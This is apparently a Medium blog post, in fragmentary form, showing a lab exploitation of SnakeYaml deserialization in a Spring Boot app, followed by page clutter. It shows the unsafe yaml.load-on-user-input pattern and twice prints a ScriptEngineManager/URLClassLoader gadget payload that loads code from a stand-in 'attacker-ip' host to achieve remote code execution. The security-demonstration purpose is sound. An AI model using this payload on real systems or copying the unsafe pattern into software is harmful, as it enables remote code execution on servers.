SnakeYaml Deserilization exploited

Yaml yaml = new Yaml();
Object obj =
yaml.load(<--user input data-->);
changing default port of apache tomcat
Include Snake yaml library support in spring boot
Web UI for YAML data entry
YAML data parser testing from UI and burp suite proxy
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

javac <name-of-the-java-file>.java

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
Remote Code Execution successful

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Setting up an RPC for the Harmony network

Recursive Digit Sum -HackerRank

Improving perceived interface responsiveness on public kiosks

Not today, Microservices!

JERSEY EASIEST WAY TO CREATE JAVA EE REST FULL WEB SERVICE

Data Science: Predict the Gender and Age Using OpenCV in Python

Game Dev Digest Issue #84 — Learning, Tips, and Free Courses

3 Channel Thermometer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Swapneil Kumar Dash

Swapneil Kumar Dash

More from Medium

Spring Security: LDAP implementation tutorial

gitlab issues

Some very important TIPS:

Reset Jenkins Admin User Password